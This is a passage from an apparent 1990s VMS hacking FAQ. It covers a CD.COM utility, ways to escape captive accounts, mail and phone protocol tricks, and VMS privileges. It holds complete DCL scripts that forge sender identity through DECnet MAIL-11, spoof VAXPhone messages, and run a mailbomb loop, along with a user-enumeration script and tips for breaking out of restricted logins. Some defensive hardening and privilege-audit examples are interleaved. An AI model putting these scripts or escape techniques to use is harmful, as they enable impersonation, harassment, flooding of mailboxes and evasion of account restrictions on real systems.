$     if (symbol .eqs. ":")  then goto CASE3B       ! :: Node
$     if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
$        ndir = f$extract(0, left, ndir) + "[" -
	      + f$extract(left, len_ndir - left+1, ndir) + "]"
$     goto SETDIR
$!
$  CASE3B:                                          ! NODE::nothing
$  if (f$length(ndir)-1 .gt. left) then goto CASE3C
$     ndir = ndir + "[000000]"
$     goto SETDIR
$!
$  CASE3C:                                          ! NODE::directory
$  if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
      then goto SETDIR
$
$     ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
$     goto SETDIR
$!
$  CASE4:                                           ! dir
$  ndir = "[" + ndir + "]"
$!
$  SETDIR:
$  set default 'ndir'
$  if (f$parse("") .eqs. "") then goto DIRERROR
$!
$  DISPLAY:
$  if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
$     hnode = f$getsyi("NODENAME")
$     cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
$     if (cnode .eqs. "") then cnode = hnode
$     cdir  = f$environment("DEFAULT")
$     write sys$output " "
$     write sys$output "          Home Node: ", hnode
$     write sys$output "     Home Directory: ", hdir
$     if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
$     write sys$output "       Current Node: ", cnode
$     write sys$output "  Current Directory: ", cdir
$  DISPSKIP:
$     write sys$output " "
$!
$  NODISPLAY:
$  ndir = f$environment("DEFAULT")
$  if .not. prompton then goto END
$!
$  if (f$length(ndir) .ge. 32) then goto TOOLONG
$!
$  SETPROMPT:
$  set prompt = 'ndir'" "
$!
$  END:
$  exit
$!
$  DIRERROR:
$  write sys$output " "
$  write sys$output "          ", ndir, " Directory does not exist!"
$  write sys$output " "
$  set default 'odir'
$  ndir = odir
$  goto NODISPLAY
$!
$! Prompt Problems------------------------------------------------------------
$!
$  TOOLONG:
$! Prompt is too long. Get rid of everything to the left of [ or <. If that
$! doesn't work, get rid of a subdirectory at a time.  As a last resort,
$! set the prompt back to $.
$!
$  left     = f$location("[", ndir)
$  len_ndir = f$length(ndir)
$  if (left .ge. len_ndir) then left = f$location("<",ndir)
$  if (left .gt. 0) .and. (left .lt. len_ndir) -
      then ndir = f$extract(left, len_ndir - left, ndir)
$!
$  STILLTOOLONG:
$    if (f$length(ndir) .lt. 32) then goto SETPROMPT
$    left     = f$location(".", ndir) + 1
$    len_ndir = f$length(ndir)
$    if left .ge. len_ndir then ndir = "$ "
$    if left .ne. len_ndir -
	then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
$    goto STILLTOOLONG
$!
$! Wildcard Directory---------------------------------------------------------
$!
$  DIRSEARCH:
$  error_message = f$environment("MESSAGE")
$  on control_y then goto DIREND
$  on control_c then goto DIREND
$  set message/nosev/nofac/noid/notext
$  write sys$output " "
$  dispct = 1
$  dirct  = 0
$  pauseflag = 1
$!
$  DIRLOOP:
$    userfile = f$search("*.dir")
$    if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
$    if (userfile .eqs. "") then goto DIRNONE
$    dispct = dispct + 1
$    dirct  = dirct  + 1
$    on severe then $ userprot = "No Priv"
$    userprot = f$file_attributes(userfile,"PRO")
$    if userprot .nes. "No Priv" then userprot = " "
$    userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
$    userprot'dirct' = userprot
$    lengthflag = (f$length(userfile'dirct') .gt. 18)
$    if lengthflag then write sys$output -
	f$fao("  !3SL   !34AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (.not. lengthflag) then write sys$output -
	f$fao("  !3SL   !20AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (dispct .lt. 8) then goto DIRLOOP
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    if pauseflag then goto DIRMENU
$    dispct = 0
$    goto DIRLOOP
$!
$  DIRMENU:
$  write sys$output " "
$  if (userfile .eqs. "") then goto DIRMENU2
$     write sys$output "    M   More subdirectories"
$  if pauseflag then -
$     write sys$output "    N   More subdirectories/No pause"
$!
$  DIRMENU2:
$     write sys$output "    R   Re-Display subdirectories"
$     write sys$output "    Q   Quit (default)"
$
$  DIRINQUIRE:
$  write sys$output " "
$  inquire dirchoice "  Select One"
$  write sys$output " "
$!
$  if (dirchoice .gt. 0)    .and. -
      (dirchoice .le. dirct) then goto DIRCASEDIGIT
$  dirchoice = f$edit(dirchoice,"UPCASE")
$  if (dirchoice .eqs. "")  .or. -
      (dirchoice .eqs. "Q")  then goto DIRCASEBLANK
$  if (dirchoice .eqs. "M") .or. -
      (dirchoice .eqs. "N")  then goto DIRCASEMORE
$  if (dirchoice .eqs. "R")  then goto DIRCASERED
$!
$  DIRCASERROR:
$  if (dirct .eq. 1)   then write sys$output -
      "  Select 1 to change to the ", userfile1, " subdirectory. "
$  revdirct = dirct
$  if (dispct .eq. 8) then revdirct = revdirct - 2
$  if (dirct .gt. 1)   then write sys$output -
      "  Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
$  goto DIRINQUIRE
$!
$  DIRCASEDIGIT:
$  if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
$  ndir = userfile'dirchoice'
$  goto DIREND
$!
$  DIRCASEBLANK:
$  write sys$output "  Subdirectory not changed."
$  write sys$output " "
$  goto DIREND
$!
$  DIRCASEMORE:
$  dispct = 0
$  if (dirchoice .eqs. "N") then pauseflag = 0
$  if (userfile .nes. "")   then goto DIRLOOP
$  write sys$output "  No more subdirectories to display."
$  goto DIRINQUIRE
$!
$  DIRCASERED:
$  dispct = 1
$  DISPLOOP:
$     if (userfile'dispct' .eqs. "") then goto DISPDONT
$     lengthflag = (f$length(userfile'dispct') .gt. 18)
$     if lengthflag then write sys$output -
	 f$fao("  !3SL   !34AS  ", dispct, userfile'dispct'), userprot'dispct'
$     if (.not. lengthflag) then write sys$output -
	 f$fao("  !3SL   !20AS  ", dispct, userfile'dispct'), userprot'dispct'
$     DISPDONT:
$     dispct = dispct + 1
$     if (dispct .le. dirct) then goto DISPLOOP
$  goto DIRMENU
$!
$  DIRNONE:
$  write sys$output "No subdirectories to choose, or no directory privileges."
$  write sys$output " "
$  goto DIREND
$!
$  DIREND:
$  set message 'error_message'
$  on control_y then exit
$  on control_c then exit
$  if (ndir .eqs. "*") then goto DISPLAY
$  goto PARSE
$!
$!-Help-----------------------------------------------------------------------
$!
$  HELP:
$  type sys$input

	       CD.COM  Version 6  VMS Change Directory Command

			 Usage:  CD command/directory

CD         Display home directory,       CD ..       Change directory to the
	   current directory, node.      CD [-]      dir above current dir.

CD \       Change directory to your      CD ..sub    Change directory to a
CD HOME    SYS$LOGIN directory.          CD [-.sub]  "sideways" subdirectory.

CD dir     Change directory to the       CD *        Display/select the
CD [dir]   [dir] directory.                          available subdirectories.

CD .sub    Change directory to the       CD .        Reset current directory.
CD [.sub]  [.sub] subdirectory.          CD ?        Display CD instructions.

     CD :== @SYS$LOGIN:CD.COM                 DEFINE SYS$PROMPT "ON"
     To make CD available from                To have the VMS $ prompt
     any directory you change to.             display the current directory.

			      By The Mentor
$  goto END

	Once uploaded,  you should add the following line to your
	LOGIN.COM:

$ CD :== @DEVICE:[PATH]CD.COM  ! Replace DEVICE/PATH with user information

8.      "Okay,  where's my .profile"

	Easy.  There is none.  VMS startup routines (for personal accounts)
	can be found in the user's home directory under the name 
	"LOGIN.COM". Also check out the system-wide login routine at
	SYS$MANAGER:SYLOGIN.COM.

9.      "I can't seem to get to the DCL prompt"

	It is possible to set up "CAPTIVE" and "RESTRICTED" accounts under
	VMS.  When set up correctly,  these can be difficult to break out
	of;  however,  in a lot of cases a simple control-C (or control-Y)
	while the LOGIN.COM is executing will drop you to the DCL prompt.
	Another way of keeping the LOGIN.COM (or any other startup commands,
	for that matter) from running is to log in with the "/NOCOMMAND"
	qualifier.  It is typed after your username at the "Username:"
	prompt,  and bypasses any account startup files/commands.  On a
	correctly set up captive account,  both of these will fail.  In
	the event that this fails,  some places slip up by allowing the
	captive process to spawn off other processes.  For example,  if
	the captive account puts you into KERMIT,  FTP,  or ALL-IN-1
	(office automation/mail package),  you might be able to 'SPAWN'
	out to DCL or issue DCL commands from inside the application.  This
	can also be prevented simply by giving the account a subprocess
	limit of zero (the PRCLM quota in AUTHORIZE).
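	What a correctly set up captive account looks like,  as an added
	example (my own,  not code from this FAQ or from Digital):  the
	AUTHORIZE flags close the /NOCOMMAND and control-Y holes,  PRCLM=0
	closes the SPAWN hole,  and the captive procedure never substitutes
	what the user typed into a DCL line.  The username APPUSER,  the
	procedure name SYS$MANAGER:CAPTIVE.COM and MAIL as the application
	are assumptions made for the illustration.

```dcl
$!----------------------------------------------------------------------------
$! SYS$MANAGER:CAPTIVE.COM -- login command procedure for a captive account
$! (added example; APPUSER, the file name and MAIL are assumptions).
$!
$! Account setup, done once from a privileged account.  Shown as a comment
$! because it is typed into AUTHORIZE, not run as part of this file:
$!
$!   $ SET DEFAULT SYS$SYSTEM
$!   $ RUN SYS$SYSTEM:AUTHORIZE
$!   UAF> MODIFY APPUSER /FLAGS=(CAPTIVE,DISCTLY,DEFCLI,LOCKPWD) -
$!   _UAF> /LGICMD=SYS$MANAGER:CAPTIVE.COM /PRCLM=0
$!   UAF> EXIT
$!
$!   CAPTIVE  LOGINOUT ignores /COMMAND, /NOCOMMAND, /CLI and /TABLES at the
$!            Username: prompt and logs the user out when this procedure exits.
$!   DISCTLY  the process starts with Ctrl-Y disabled.
$!   DEFCLI   only the default command interpreter may be used.
$!   LOCKPWD  the password cannot be changed from inside the application.
$!   PRCLM=0  subprocess quota of zero: SPAWN fails, from DCL and from inside
$!            MAIL, KERMIT and the like.
$!----------------------------------------------------------------------------
$ SET NOVERIFY
$ ON CONTROL_Y THEN GOTO MENU       ! Ctrl-Y inside an application returns here
$ SET CONTROL=Y                     ! ... rather than staying disabled (DISCTLY)
$MENU:
$ ON ERROR THEN GOTO MENU           ! an error must never fall through to "$ ";
$ ON CONTROL_Y THEN GOTO MENU       ! both handlers are re-armed on every pass
$ READ/END_OF_FILE=DONE/ERROR=DONE/PROMPT="APP> " SYS$COMMAND CMD
$ CMD = F$EDIT(CMD, "UPCASE,TRIM,COMPRESS")
$ IF CMD .EQS. "" THEN GOTO MENU
$! Dispatch on an exact verb.  What the user typed is never substituted into
$! a DCL line ('CMD'), so "@proc", "=", lexicals and SPAWN in it are only text.
$ VERB = F$ELEMENT(0, " ", CMD)
$ IF VERB .EQS. "MAIL"   THEN GOTO DO_MAIL
$ IF VERB .EQS. "HELP"   THEN GOTO DO_HELP
$ IF VERB .EQS. "LOGOUT" THEN GOTO DONE
$ WRITE SYS$OUTPUT "%CAPTIVE-W-IVVERB, unrecognized command """, VERB, """"
$ GOTO MENU
$DO_MAIL:
$ DEFINE/USER_MODE SYS$INPUT SYS$COMMAND   ! MAIL reads the terminal, not this file
$ MAIL                                     ! its SPAWN command fails: PRCLM is 0
$ GOTO MENU
$DO_HELP:
$ WRITE SYS$OUTPUT "Commands: MAIL, HELP, LOGOUT"
$ GOTO MENU
$DONE:
$ LOGOUT                                   ! CAPTIVE would log out on exit anyway
```

	To verify,  log in as APPUSER and try each hole in turn:  control-Y
	or control-C while the procedure runs (you should land back at the
	APP> prompt,  not at "$"),  "APPUSER/NOCOMMAND" at the Username:
	prompt (it has no effect on a CAPTIVE account),  and SPAWN from
	inside MAIL (fails for lack of subprocess quota).  Two caveats:
	PRCLM=0 breaks any application that legitimately needs a
	subprocess,  and a captive procedure that takes the user's text and
	substitutes it into a command line with 'cmd' gives the whole game
	away,  which is why the loop above dispatches on an exact verb
	instead.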

*10.     Terminal Spoofing

	There are many DEC VT terminal spoofing programs around to be
	found.  One can even be found on page 32 of the Winter 94-95
	issue of 2600:  "Hook" by Mr. Bungle.

*11.     User Spoofing

	Programs such as "SETUSER" and "GLOGIN" are in the public domain
	and let a privileged user operate as another user.

*12.     Accounting/Auditing Information

	Accounting information is kept in the file SYS$MANAGER:ACCOUNTNG.DAT
	($ ACCOUNTING).
	A list of auditing options is available to the system manager
	($ SET AUDIT).
	An intrusion database is part of the VMS security scheme
	($ SHOW INTRUSION).
	"The Supervisor Series" (as reviewed in the Fall 94 issue of 2600)
	allows a privileged user to spy on and intervene in another user's
	on-line activities.  It is public domain,  available at
	ftp.spc.edu /anonymous/macro32/savesets.
	There are also short programs out there for a privileged user to look
	at a user's command buffer.

		 -       VMSmail/SMTP Information     - 

1.     It is possible to send fake mail through the VMSmail DECnet object
       (MAIL-11,  object 27):  the object accepts whatever sender string the
       client supplies,  so the "From:" the recipient sees is untrusted.  The
       DECnet object logs on the receiving node,  which record the real
       originating node and user of the link,  are readable by sys admins.

$! To send anonymous or fake messages (except for remote node system admins -
$! mail server logs) through the MAIL mailbox to any user on the NET;
$! must only have NETMBX privilege.
$! P1 = remote node,  P2 = sender string the recipient will see (forged),
$! P3 = real recipient on the remote node,  P4 = "To:" string shown to the
$! recipient,  P5 = subject,  P6 = file with the message text (optional)
$null[0,8] = 0
$remote_node = P1
$if P1 .eqs. "" then read sys$command remote_node   /prompt="node: "
$local_user = P2
$if P2 .eqs. "" then read sys$command local_user    /prompt="local user: "
$local_user := 'local_user                      ! remove blanks and lowercases
$real_remote_user = P3
$if P3 .eqs. "" then -
  read sys$command real_remote_user /prompt="real remote user: "
$real_remote_user := 'real_remote_user          ! remove blanks and lowercases
$remote_user = P4
$if P4 .eqs. "" then read sys$command remote_user /prompt="remote user: "
$remote_user := 'remote_user           ! remove blanks and lowercases
$subject = P5
$if P5 .eqs. "" then read sys$command subject       /prompt="subject: "
$filename = P6
$if P6 .eqs. "" then read sys$command filename      /prompt="file name: "
$filename := 'filename
$!
$open/read/write slave 'remote_node'::"27="
$write slave "''local_user'"
$write slave "''real_remote_user'"
$read slave status
$write sys$output f$fao("Addressee status is: !XL",f$cvui(0,8,status))
$write slave null
$if filename .nes. ""
$ then
$  write slave "''remote_user'"
$  write slave "''subject'"
$  open/read/error=end_of_file file 'filename'
$loop:
$  read/end=end_of_file file record
$  write slave "''record'"
$  goto loop
$else
$ write slave "To whomever it concerns"
$ write slave "Demo of using VAXMail protocol"
$ write slave "This is message line"
$endif
$end_of_file:
$close/nolog file
$write slave null
$read slave status
$write sys$output f$fao("Delivery status is: !XL",f$cvui(0,8,status))
$close slave
$exit

			VMS Mail Hack Routines

1.      "Can I use my favorite Unix sendmail holes on VMS sendmail?"

	Don't be silly.  No...  Digital did not believe that sendmail
	bugs and holes were important enough to port (grin).  (It
	has been rumored that one sendmail hole *was* actually ported,
	but as of this time,  this has not been verified.)

2.      "How can I code a mail bomb routine,  so that I can piss off
	 people really good and eat 'bandwidth'."

	Like this,  below...  

$! Simple VMS Mailbomb routine. 
$! Please be somewhat human.   Don't do this crap.
$!
$ say :== write sys$output
$ on error then goto err
$ if p4 .eqs. "" 
$ then 
$ say "Mailbomb V1.0                            Coded By The Beaver"
$ say "1995"
$ say ""
$ say "Usage:"
$ say "MAILBOMB [Msg Subject] [File to bomb with] [Username] [# of Times]"
$ exit
$ endif
$ A=1
$ loop:
$ mail/subject='p1' 'p2' 'p3' 
$ A = A + 1
$ if A .eqs. p4
$       then
$       say "Bomb Is Complete"
$       exit
$       endif
$ goto loop
$ err:
$ say "A Error has occured.  Be sure all files are present and correct"
$ exit

			 - VAXPhone Information -

*1.      The phone protocol allows you to send messages.
	Example follows:

$! To send anonymous or fake messages(except for remote node system admins -
$! phone server logs) through the PHONE mailbox to any user logged on the NET,
$! similar to phone ringing messages broadcast to users' terminals; must only
$! have NETMBX privilege
$! Note:
$! This has the unfortunate side effect of kicking the user off his phone if 
$! its not a patched version.
$!
$ debug = "F"
$ null_byte[0,8] = 0
$ true_byte[0,8] = 1
$ false_byte[0,8] = 0
$ id_rmt_user[0,8] = 7          !text = id of remote user, status rtn
$ ring_rmt_user[0,8] = 8        !text = 1 byte, true if first ring, sts rtn
$ hang_up[0,8] = 9              !link broken, no status
$ master_busy[0,8] = 10         !when requested to do other functions
$ master_answer[0,8] = 11       !from another master
$ master_reject[0,8] = 12       !from another master
$ slave_exit[0,8] = 13          !command to slave
$ text[0,8] = 14                !text >= 1 char frag
$ request_dir[0,8] = 15         !null returned when done
$ force_third_party[0,8] = 17   !text is id of 3rd party
$ on_hold[0,8] = 18             !put target on hold
$ off_hold[0,8] = 19            !take target off hold
$!
$ status_unknown = 0    !Unknown problem
$ status_success = 1    !The operation was completed successfully.
$ status_isyntax = 2    !Invalid user syntax
$ status_nocomm = 3     !Slave could not communicate with user
$ status_missunam = 4   !<node::user> missing user name
$ status_nopriv = 5     !The slave does not have necessary privileges.
$ status_noexist = 6    !The specified Target user does not exist.
$ status_badterm = 7    !The Target's terminal cannot be used by PHONE.
$ status_logoff = 8     !The Target logged off during the procedure.
$ status_offhook = 9    !Target phone off hook (e.g., /NOBROADCAST set).
$!
$ remote_node = P1
$ if P1 .eqs. "" then read sys$command remote_node   /prompt="node : "
$ remote_user = p2
$ if P2 .eqs. "" then read sys$command remote_user   /prompt="user : "
$ remote_user := 'remote_user                   ! remove blanks and lowercases
$ local_user_in = "''P3'"
$ if P3 .eqs. "" then read sys$command local_user_in /prompt="text : "
$ local_user = "msg:: " + local_user_in + -
   "                                                                      " -
   + null_byte
$ open/read/write link 'remote_node'::"29="
$ write link id_rmt_user,local_user,remote_user
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if debug then write sys$output "Link to phone setup"
$ if local_user_in .eqs. "" then goto exit
$ write link ring_rmt_user,local_user,true_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if debug then write sys$output "1 ringy-dingy"
$       count = 1
$ on control_y then goto exit
$  goto exit
$LOOP:
$ write link ring_rmt_user,local_user,false_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$       if count .ge. 3 then goto exit
$       count = count +1
$       if debug then write sys$output count," ringy-dingies"
$ goto loop
$EXIT:
$ write link slave_exit,local_user
$ close link
$       if debug then write sys$output "Link cleared"
$ exit
$ERROR:
$! under development
$ write sys$output "An error has occured."
$ close link
$ exit

2.      The phone protocol allows you to get a list of interactive users on
	a system.
	From DEC's own archives, example follows:

$ vfy = f$verify(f$integer(f$logical("debug")) .or. f$integer('debug'+0))
$ if f$cvui(1,1,'debug'+0) .or. f$cvui(1,1,f$logical("debug")+0) -
    then write sys$error "File: PHONEDIR.COM, 29-Feb-1984"
$!++
$!  PHONEDIR.COM, E2.0 28-Oct-1985
$!
$!  COPYRIGHT (c) 1984 By
$!  DIGITAL EQUIPMENT CORPORATION, Maynard, Massachusetts 01754.
$!  All Rights Reserved.
$!
$!  This software is furnished without license and may be used and  copied
$!  only with the inclusion of the above copyright notice. No title to and
$!  ownership of the software is hereby transferred.
$!
$!  The information in this software is subject to change  without  notice
$!  and  should  not  be  construed as  a commitment by Digital  Equipment
$!  Corporation.
$!
$!  Digital  assumes  no responsibility for the use or reliability of this
$!  software.
$!--
$!++
$!  Author: SWM,  29-Feb-84,  PARROT::SWM
$!
$!  Edited:
$!    23-Nov-84 SWM, User lookup, V3 compatablility, Psthru capability.
$!    24-Nov-84 DC, Added logical name translation.
$!    30-Nov-84 DC, '_' overrides logical, infn loop check.
$!    27-Oct-85 SWM, Protocol fix, pipelining, clean up code.
$!
$!  Abstract:
$!    Take a directory of users across network via phone protocol.
$!
$!  Inputs: P1 = Node:: (or Node::Node::...) to get user list from;
$!    or Node::User to check on.  Remote user can be specified as
$!    separate parameter P2.  Double colon optional if single node.
$!
$!--
$INITIALIZE:
$ on control_y then goto close
$ set noon
$ v4 = "true"
$ if f$extr(0,2,f$getsyi("version")) .eqs. "V3" then v4 = "false"
$!$ error_status = %x1001C002
$ null[0,8] = 0
$!$ if v4 then old_msg = f$envi("message")
$!$ set message /nofacility/noseverity/noidentification/notext
$!
$ask_node_name:
$ if p1 .eqs. "" then read/end=exit/error=exit sys$command p1 /prompt="Node? "
$ if p1 .eqs. "" then goto exit
$!
$! allow override of node::user logical names
$ sanity_check = 0
$log_name_loop:
$ underscore_found = f$locate("_",p1) .eq. 0
$ if underscore_found then goto got_node_name
$ if f$logi(p1) .eqs. "" then goto got_node_name
$ p1 = f$logi(p1)
$ sanity_check = sanity_check + 1
$ if sanity_check .le. 64 then goto log_name_loop
$ goto error
$!
$got_node_name:
$! add username to node string if specified as separate parameter
$ if p2 .nes. "" then -
   if f$extr(f$leng(p1)-2,2,p1) .eqs. "::" then p1 = f$extr(0,f$leng(p1)-2,p1)
$ if p2 .nes. "" then p1 = p1 + "::" + p2
$! check if single node specified without dbbl colon.
$ if p2 .eqs. "" then -
    if f$parse(p1,,,"node") .eqs. "" then p1 = p1 + "::"
$!-    if f$extr(f$leng(p1)-2,2,p1) .nes. "::" then p1 = p1 + "::"
$!
$ if v4 then p1 = f$edit(p1,"trim,upcase,uncomment")
$ if .not. v4 then p1 := 'p1'
$ remote_user_name = f$parse(p1,,,"name")
$ node = f$extr(0,f$leng(p1)-f$leng(remote_user_name),p1)
$ if node .eqs. "" then node = f$logi("sys$node")
$! commented out doesn't work if access ctrl (f$parse hides password).
$!$ remote_user = node - f$parse(f$extr(0,f$leng(node)-2,node),,,"node") -
$!-    + remote_user_name       ! remove any psthru node names...
$!
$ sanity_check = 0
$ temp = node
$ node_string = ""
$! loop to find name of destination node for use in phone protocol...
$dest_node_loop:
$ loc = f$loca("::",temp)
$ node_string = node_string + f$parse(f$extr(0,loc+2,temp),,,"node")
$! commented out for alternate node_string display if using access ctrl.
$!$ node_string = node_string + f$extr(0,loc,temp)
$!$ node_string = f$extr(0,f$loca("""",node_string),node_string) + "::"
$ remote_user = f$extr(0,loc,temp)                      ! last node
$ remote_user = f$extr(0,f$loca("""",remote_user),remote_user) ! minus a/c.
$ temp = f$extr(loc+2,999,temp)
$ sanity_check = sanity_check + 1
$ if f$loca("::",temp) .ne. f$leng(temp) .and. sanity_check .lt. 32 -
    then goto dest_node_loop
$ remote_user = remote_user + "::" + remote_user_name
$!
$ if v4 then local_user = f$logi("sys$node") + -
    f$edit(f$getjpi("","pid"),"trim,upcase")
$ if .not. v4 then local_user := 'f$logi("sys$node")''f$getjpi("","pid")'
$ local_user = local_user - "_" + null                  ! asciz string
$!
$CREATE_LINK:
$! noon is set so display error message
$ open/read/write slave 'node'"29="
$ save_status = $status
$!$ if save_status .eq. error_status then goto unreachable
$ if .not. save_status then goto exit
$!
$ if remote_user_name .eqs. "" then goto dir_function
$LOCATE_FUNCTION:
$ message[0,8] = 7                                      ! ID remote user
$ message = message + local_user + remote_user
$ write/error=error slave message
$ read/end=error/error=error slave record
$ if f$cvui(0,8,record) .eq. 1 then -
    write sys$output "''remote_user' is currently available."
$! Note: These response values, while defined in the phone protocol do
$!   not seem to be supported in response to the ID function for VAXPhone.
$ if f$cvui(0,8,record) .eq. 6 then -
    write sys$output "''remote_user' is not available."
$ if f$cvui(0,8,record) .eq. 7 then -
    write sys$output "''remote_user''s phone is not usable by phone."
$ if f$cvui(0,8,record) .eq. 9 then -
    write sys$output "''remote_user''s phone is off hook (/NOBROADCAST)."
$ if (f$cvui(0,8,record) .ne. 1) .and. (f$cvui(0,8,record) .ne. 6) .and. -
    (f$cvui(0,8,record) .ne. 7) .and. (f$cvui(0,8,record) .ne. 9) then -
   write sys$output "''f$fao("Bad status received = !2ZB.",f$cvui(0,8,record))
$ exit_command[0,8] = 13
$ write/error=error slave exit_command,local_user
$ goto close
$!
$DIR_FUNCTION:
$ message[0,8] = 15                                     ! Request directory
$ message = message + local_user
$ write/error=error slave message
$ write/error=error slave message                       ! Pipeline requests!!!
$ write/error=error slave message
$ write/error=error slave message
$! Pipelining limited to 2 extra requests max to keep procedure from hanging.
$!   Worst case limit is (DECnet_Pipeline_Quota/DECnet_Buffer_Size) * 2 + 1
$print_header:
$ count = 0
$ write sys$output ""
$ write sys$output "	Directory of Users on Node ",node_string
$ write sys$output ""
$! skip pipeline hack code as RMS timeouts don't with DECnet yet.
$ GOTO LOOP
$!$ if .not. v4 then write/error=error slave message
$ if .not. v4 then goto loop
$! Put up to 8 requests in logical link pipe...
$ sanity_check = 3                                      ! number msgs in pipe.
$pipeline_hack:
$ sanity_check = sanity_check + 1
$ if sanity_check .ge. 8 then goto loop
$ write/error=error slave message
$ read/end=eof/error=pipeline_hack/timeout=0 slave record
$ goto loop_alt_entry
$!
$loop:
$ read/end=eof/error=error slave record
$loop_alt_entry:
$ if record .eqs. "" then goto done
$ write/error=error slave message
$ write sys$output record
$ count = count + 1
$ goto loop
$eof:
$! rsx-11 phone slave closes link after directory function.
$ rsx = "  (System is RSX)"
$done:
$ write sys$output ""
$ write sys$output "Total number of users = ''f$string(count)'''rsx'"
$! don't tell slave to exit if link already closed.
$ if "''rsx'" .nes. "" then goto close
$ exit_command[0,8] = 13
$ exit_command = exit_command + local_user
$ write slave exit_command
$eof_loop:
$ GOTO CLOSE                                            ! Hack!!!
$! Note: Should finish up properly by reading all responses.
$ read/end=close/error=error slave dummy
$!$ write sys$output dummy                              ! show empty data
$ goto eof_loop
$!
$unreachable:                                           ! this removed...
$! this section left in for possible enhanced error checking...
$!$ write sys$output ""
$!$ write sys$output "Node unreachable, unknown, or object unknown."
$ goto exit
$ERROR:
$ write sys$error "PHONEDIR-E-BugCheck, An error has occured."
$close:
$! close the link no matter what.
$ close /error=exit slave
$exit:
$!$ set message 'old_msg'
$ if vfy then set verify                                ! 'f$verify(0)'
$ exit

	BTW: There is a modified phone program available via
	     anonymous ftp which gives increased functionality
	     with commands such as 'reject' and 'transcribe'

	      -      User/Image Privilege Information     -

1.      "How are user privileges set up?"

	User privileges are handled in a completely different manner
	than Unix handles them.  With Unix,  broadly speaking,  you have
	either

	a> all privileges (IE - "root")
	b> standard user

	VMS is a touch different.

	For example,  let's say you have a field engineer who needs
	a standard user account (I.E. - be able to send/receive mail,
	do standard DCL commands.. normal TMPMBX,  NETMBX,  and
	all that),  but in order to do his job,  he needs to run the
	online VMS diagnostics software (which is a privileged operation).
	When you add the user,  you can grant him the "DIAGNOSE" privilege
	along with the normal user privileges,  and he will be able to run
	regular user commands and the diagnostics.

	What this means is that you can grant certain privileged
	functions to certain users,  rather than giving the user
	"the whole system".

	This user we added would only have access to privileges that deal
	with the diagnostic software.  For example,  he could not add
	users (via "AUTHORIZE" or by modifying SYSUAF.DAT).

"Privileges restrict the use of certain system functions to processes
created on the behalf of authorized users.  These restrictions protect
the integrity of the operating system code,  data,  and resources and
thus,  the integrity of user services."

"Users cannot execute an image that requires a privilege they do not
possess,  unless the image is installed as a known image with the
privilege in question or the image runs within a protected subsystem"

	Privileges can also be installed on images,  so that when that
	image is executed,  the process running that image gets the
	privileges the image has been granted (this does not mean that
	the user gets the privileges permanently,  but rather,  just the
	process,  for as long as it is running that image)

			- OpenVMS VAX Guide To System Security
			  (6.0 manual). 
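	The checks that go with this,  as an added example (my own,  not
	code from this FAQ or from the manual):  flag any ALL-class
	privilege the current process holds,  compare the current and
	authorized masks (a user with SETPRV in the UAF can SET PROCESS/PRIV
	to anything,  so the authorized mask is what matters),  and look at
	what an installed image carries.  The list in ALL_CLASS is the set
	the OpenVMS Guide to System Security groups under "ALL" (any one of
	them is equivalent to "the whole system";  DETACH is called
	IMPERSONATE on later versions,  where the DETACH name will simply
	not match);  everything else is standard DCL.

```dcl
$!----------------------------------------------------------------------------
$! PRIVCHECK.COM -- what does this process hold, what could it hold, and
$! what does an installed image add?  (added example, not from the FAQ)
$!----------------------------------------------------------------------------
$ SET NOON
$! Privileges in the ALL category of the Guide to System Security: any one
$! of them is equivalent to full control of the system.
$ ALL_CLASS = "BYPASS,CMEXEC,CMKRNL,DETACH,DOWNGRADE,LOG_IO,PFNMAP,PHY_IO," + -
	      "READALL,SETPRV,SHARE,SYSNAM,SYSPRV"
$ FOUND = 0
$ I = 0
$NEXT:
$ PRV = F$ELEMENT(I, ",", ALL_CLASS)
$ IF PRV .EQS. "," THEN GOTO REPORT       ! F$ELEMENT returns the delimiter past the end
$ IF F$PRIVILEGE(PRV) THEN FOUND = FOUND + 1
$ IF F$PRIVILEGE(PRV) THEN -
	WRITE SYS$OUTPUT "  holds ALL-class privilege: ", PRV
$ I = I + 1
$ GOTO NEXT
$REPORT:
$ IF FOUND .EQ. 0 THEN WRITE SYS$OUTPUT "  no ALL-class privilege currently enabled"
$!
$! The current mask is not the whole story: anything in the authorized mask
$! can be turned on with SET PROCESS/PRIVILEGES, and SETPRV there means "all".
$ WRITE SYS$OUTPUT "  current mask:    ", F$GETJPI("", "CURPRIV")
$ WRITE SYS$OUTPUT "  authorized mask: ", F$GETJPI("", "AUTHPRIV")
$!
$! Privileges also come from the image: a known image installed with
$! privileges runs with them added to the process's own, for as long as
$! that image is active.  LOGINOUT is the standard example.
$ INSTALL LIST/FULL SYS$SYSTEM:LOGINOUT.EXE
$ EXIT
```

	Run it from the account under review (or from inside a captive
	application's SPAWN-less session,  if you can get one).  An
	ALL-class privilege in the authorized mask of an ordinary user,  or
	a non-Digital image showing up in INSTALL LIST/FULL with privileges,
	is the finding to chase.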

	Below is a listing of privileges,  and a brief description.

ACNT      -     Lets a process use the RUN (Process) command or the Create
		Process ($CREPRC) system service to create processes
		in which accounting is disabled.  A process in which
		accounting is disabled is one whose resource use is not logged.

ALLSPOOL  -     This privilege lets the user's process allocate a spooled
		device by executing the Allocate Device ($ALLOC) system
		service or by using the DCL command "ALLOCATE".

ALTPRI    -     Allows the user's process to 
		1.  Increase its own priority
		2.  Set the base priority of a target process
		3.  Change priority of its batch or print jobs. 

AUDIT     -     Allows software to append audit records to the system
		security audit log file.   As a result,  this privilege
